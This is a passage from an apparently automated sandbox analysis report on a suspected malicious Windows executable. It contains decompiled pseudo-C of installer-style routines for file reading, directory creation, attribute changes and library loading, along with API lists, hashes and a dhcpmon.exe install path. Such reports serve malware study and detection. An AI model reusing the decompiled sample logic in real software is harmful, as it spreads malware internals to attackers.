                                                                    0x00000000
                                                                    0x00403412
                                                                    0x00000000

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 004032D3
                                                                      • Part of subcall function 0040343E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C
                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 00403306
                                                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,0040B8A0,0041D460,00004000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF), ref: 00403401
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FilePointer$CountTick
                                                                    • String ID: `TA
                                                                    • API String ID: 1092082344-1754987364
                                                                    • Opcode ID: 3d13d1d14bea50cb7a84346b616f5d02e9ab79d37600768ca2325cb979edba2a
                                                                    • Instruction ID: bb82d22d1a80a93a7495f99719332701a8bc5653d470bc60fdd2df8261a6fa09
                                                                    • Opcode Fuzzy Hash: 3d13d1d14bea50cb7a84346b616f5d02e9ab79d37600768ca2325cb979edba2a
                                                                    • Instruction Fuzzy Hash: 3A31B3726042159FDB10BF29EE849263BACFB40359B88813BE405B62F1C7785C428A9D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 87%
                                                                    			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405C7E(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405C10(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004058B7(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058D4(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E0040583A(_t28);
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040624D("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                                    0x004015bb
                                                                    0x004015c2
                                                                    0x004015c5
                                                                    0x004015ca
                                                                    0x004015ce
                                                                    0x004015d0
                                                                    0x004015d8
                                                                    0x004015da
                                                                    0x004015dc
                                                                    0x004015e0
                                                                    0x004015e3
                                                                    0x004015fb
                                                                    0x004015fc
                                                                    0x004015e5
                                                                    0x004015e5
                                                                    0x004015e8
                                                                    0x00000000
                                                                    0x004015f3
                                                                    0x004015f4
                                                                    0x004015f4
                                                                    0x004015e8
                                                                    0x00401603
                                                                    0x0040160a
                                                                    0x00401617
                                                                    0x00401617
                                                                    0x0040160c
                                                                    0x0040160d
                                                                    0x00401615
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00401615
                                                                    0x0040160a
                                                                    0x0040161a
                                                                    0x0040161d
                                                                    0x0040161f
                                                                    0x00401620
                                                                    0x004015d0
                                                                    0x00401627
                                                                    0x00401652
                                                                    0x004022dd
                                                                    0x00401629
                                                                    0x0040162b
                                                                    0x00401636
                                                                    0x0040163c
                                                                    0x00401644
                                                                    0x0040164a
                                                                    0x0040164a
                                                                    0x00401644
                                                                    0x00402a5d
                                                                    0x00402a69

                                                                    APIs
                                                                      • Part of subcall function 00405C7E: CharNextA.USER32(?,?,0042BCC0,?,00405CEA,0042BCC0,0042BCC0,76D7FA90,?,76D7F560,00405A35,?,76D7FA90,76D7F560,00000000), ref: 00405C8C
                                                                      • Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405C91
                                                                      • Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405CA5
                                                                    • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                      • Part of subcall function 0040583A: CreateDirectoryA.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 0040587D
                                                                    • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user~1\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                                                    Strings
                                                                    • C:\Users\user~1\AppData\Local\Temp, xrefs: 00401631
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp
                                                                    • API String ID: 1892508949-3107243751
                                                                    • Opcode ID: d300222a80fe589d7c409aaa2dc9a8870679af7cb65b336be68641a3b2763995
                                                                    • Instruction ID: 4524d263cfc656ab508a586836abab8f1c5f66e1bf0f475862462bf062351d6a
                                                                    • Opcode Fuzzy Hash: d300222a80fe589d7c409aaa2dc9a8870679af7cb65b336be68641a3b2763995
                                                                    • Instruction Fuzzy Hash: C7110832108141EBDB307FA54D409BF37B49A92314B28457FE591B22E3D63C4942962E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405969, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405969(intOrPtr _a4, unsigned int _a8) {
				unsigned int _t3;
				int _t7;
				unsigned int _t8;
				signed int _t10;

				_t3 = _a8;
				_t10 = _t3 & 0x001fffff;
				if( *0x42f500 == 0) {
					L2:
					if( *0x42f508 != 0) {
						_t10 = _t10 ^ 0x00180000;
					}
					 *0x40a234 =  *0x42f448;
					 *0x40a238 =  *0x42f440;
					 *0x40a23c = _a4;
					 *0x40a240 = 0x42ec40;
					 *0x40a244 = _t10; // executed
					_t7 = MessageBoxIndirectA("("); // executed
					return _t7;
				}
				_t8 = _t3 >> 0x15;
				if(_t8 == 0) {
					goto L2;
				}
				return _t8;
			}







                                                                    0x00405969
                                                                    0x0040596f
                                                                    0x0040597c
                                                                    0x00405983
                                                                    0x0040598a
                                                                    0x0040598c
                                                                    0x0040598c
                                                                    0x0040599c
                                                                    0x004059a6
                                                                    0x004059af
                                                                    0x004059b4
                                                                    0x004059be
                                                                    0x004059c4
                                                                    0x00000000
                                                                    0x004059c4
                                                                    0x0040597e
                                                                    0x00405981
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004059ca

                                                                    APIs
                                                                    • MessageBoxIndirectA.USER32 ref: 004059C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: IndirectMessage
                                                                    • String ID: Setup Setup
                                                                    • API String ID: 1874166685-1037079524
                                                                    • Opcode ID: 00a72194d7431dd90cc833c15a2df0ff8766ba406ab967dfdf96e8e3c192c053
                                                                    • Instruction ID: aa5d562c832b99d9798028195c670e8934f82b4d45d0c7c6d97b8a2015a1dd7d
                                                                    • Opcode Fuzzy Hash: 00a72194d7431dd90cc833c15a2df0ff8766ba406ab967dfdf96e8e3c192c053
                                                                    • Instruction Fuzzy Hash: 96F0F2B2610701DFC764DF18EA84B163BF0E719324F80817EE584A23A0D7B9849ACF4B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004031B7, Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 92%
                                                                    			E004031B7(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42f4b8;
					 *0x429464 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0);
				}
				_t22 = E004032BF(4);
				if(_t22 >= 0) {
					_t24 = E00405E5E( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x429464 =  *0x429464 + 4;
						_t36 = E004032BF(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x429464 =  *0x429464 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E00405E5E( *0x40a01c, 0x41d460, _t28) == 0) {
											goto L18;
										}
										if(E00405E8D(_a8, 0x41d460, _v8) == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x429464 =  *0x429464 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}













                                                                    0x004031bb
                                                                    0x004031c4
                                                                    0x004031cd
                                                                    0x004031d1
                                                                    0x004031dc
                                                                    0x004031dc
                                                                    0x004031e4
                                                                    0x004031eb
                                                                    0x004031fd
                                                                    0x00403204
                                                                    0x004032a9
                                                                    0x004032a9
                                                                    0x00000000
                                                                    0x0040320a
                                                                    0x0040320d
                                                                    0x00403219
                                                                    0x0040321d
                                                                    0x004032b7
                                                                    0x004032b7
                                                                    0x00403223
                                                                    0x00403226
                                                                    0x00403285
                                                                    0x0040328b
                                                                    0x0040328d
                                                                    0x0040328d
                                                                    0x0040329f
                                                                    0x004032a7
                                                                    0x004032ae
                                                                    0x004032b1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403228
                                                                    0x0040322b
                                                                    0x00000000
                                                                    0x00403231
                                                                    0x00403236
                                                                    0x0040323d
                                                                    0x00403240
                                                                    0x00403242
                                                                    0x00403242
                                                                    0x0040324f
                                                                    0x00403259
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403269
                                                                    0x00403281
                                                                    0x004032ab
                                                                    0x004032ab
                                                                    0x0040326b
                                                                    0x0040326b
                                                                    0x0040326e
                                                                    0x00403271
                                                                    0x00403277
                                                                    0x0040327d
                                                                    0x00000000
                                                                    0x0040327f
                                                                    0x00000000
                                                                    0x0040327f
                                                                    0x0040327d
                                                                    0x00000000
                                                                    0x00403269
                                                                    0x00000000
                                                                    0x00403236
                                                                    0x0040322b
                                                                    0x00403226
                                                                    0x0040321d
                                                                    0x00403204
                                                                    0x004032b9
                                                                    0x004032bc

                                                                    APIs
                                                                    • SetFilePointer.KERNEL32(0040A130,00000000,00000000,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 004031DC
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: fc26a755f646aae9f4b69ebd4f79a6bf72dbf4e01b0b4055b2eb183f4ae24420
                                                                    • Instruction ID: f7a06b24e1bdd84e59f3f5cc49a67b6726d22d07d12c3136825aaea33ef0281b
                                                                    • Opcode Fuzzy Hash: fc26a755f646aae9f4b69ebd4f79a6bf72dbf4e01b0b4055b2eb183f4ae24420
                                                                    • Instruction Fuzzy Hash: 91318D70200218EFDB109F95DD44A9A3BACEB04759F1044BEF905E61A0D3389E51DBA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 59%
                                                                    			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f490;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42ec2c =  *0x42ec2c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec2c, 0x7530,  *0x42ec14), 0);
					}
				}
				return 0;
			}











                                                                    0x0040138a
                                                                    0x004013fa
                                                                    0x0040139b
                                                                    0x004013a0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004013a2
                                                                    0x004013a3
                                                                    0x004013ad
                                                                    0x00000000
                                                                    0x00401404
                                                                    0x004013b0
                                                                    0x004013b7
                                                                    0x004013bd
                                                                    0x004013be
                                                                    0x004013c0
                                                                    0x004013c2
                                                                    0x004013b9
                                                                    0x004013b9
                                                                    0x004013ba
                                                                    0x004013ba
                                                                    0x004013c9
                                                                    0x004013cb
                                                                    0x004013f4
                                                                    0x004013f4
                                                                    0x004013c9
                                                                    0x00000000

                                                                    APIs
                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                    • SendMessageA.USER32 ref: 004013F4
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
                                                                    • Instruction ID: 4ffa91c62993149d5f3561e9fd219417dede2ec5d116c30815b8555db40bf4f7
                                                                    • Opcode Fuzzy Hash: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
                                                                    • Instruction Fuzzy Hash: 480121317242109BE7184B7A8D04B6A32A8E710318F10853AF841F61F1DA789C028B4C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00406656, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00406656(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a258);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
				}
				_t5 = E004065E8(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                    0x0040665e
                                                                    0x00406661
                                                                    0x00406668
                                                                    0x00406670
                                                                    0x0040667c
                                                                    0x00000000
                                                                    0x00406683
                                                                    0x00406673
                                                                    0x0040667a
                                                                    0x00000000
                                                                    0x0040668b
                                                                    0x00000000

                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                                      • Part of subcall function 004065E8: GetSystemDirectoryA.KERNEL32 ref: 004065FF
                                                                      • Part of subcall function 004065E8: wsprintfA.USER32 ref: 00406638
                                                                      • Part of subcall function 004065E8: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                    • String ID:
                                                                    • API String ID: 2547128583-0
                                                                    • Opcode ID: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                                    • Instruction ID: a5acf963d4dc7277efada4342fe0793da34265ba7e3dd7efcecf40f1b2e2af73
                                                                    • Opcode Fuzzy Hash: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                                    • Instruction Fuzzy Hash: 48E086326042106AD6106B705E0497773A89F847103034D3EF94AF2140D739DC31966D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405DE6, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 68%
                                                                    			E00405DE6(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                    0x00405dea
                                                                    0x00405df7
                                                                    0x00405e0c
                                                                    0x00405e12

                                                                    APIs
                                                                    • GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,80000000,00000003), ref: 00405DEA
                                                                    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$AttributesCreate
                                                                    • String ID:
                                                                    • API String ID: 415043291-0
                                                                    • Opcode ID: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                                                    • Instruction ID: c1cd633b288b309c16b37b55694bd397a2d2f3fd27c3ea135bedd35eac3c4d3c
                                                                    • Opcode Fuzzy Hash: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                                                    • Instruction Fuzzy Hash: D9D09E31254602AFEF0D8F20DE16F2E7AA2EB84B00F11952CB682944E2DA715819AB19
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405DC1, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405DC1(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                                                                    0x00405dc6
                                                                    0x00405dcc
                                                                    0x00405dd1
                                                                    0x00405dda
                                                                    0x00405dda
                                                                    0x00405de3

                                                                    APIs
                                                                    • GetFileAttributesA.KERNELBASE(?,?,004059D9,?,?,00000000,00405BBC,?,?,?,?), ref: 00405DC6
                                                                    • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405DDA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                    • Instruction ID: cf7f7f764d64860b039e5252603fd5f93999e207008e06c25ada038bd68c9de4
                                                                    • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                    • Instruction Fuzzy Hash: 16D0C976504421AFC2112728AE0C89BBB55DB542B1702CA36FDA5A26B2DB304C569A98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004058B7, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004058B7(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                    0x004058bd
                                                                    0x004058c5
                                                                    0x00000000
                                                                    0x004058cb
                                                                    0x00000000

                                                                    APIs
                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,00403479,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004058BD
                                                                    • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058CB
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateDirectoryErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1375471231-0
                                                                    • Opcode ID: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                                                    • Instruction ID: 533fd4e2b3ea02dfd4e86ffada44851bb532735a7b96714f173b1300ab50f423
                                                                    • Opcode Fuzzy Hash: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                                                    • Instruction Fuzzy Hash: 53C04C31214A019BE6506B319F09B177BA4AF50741F118439678AF01A1DB34846ADA6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405E5E, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                    Download Yara Rule
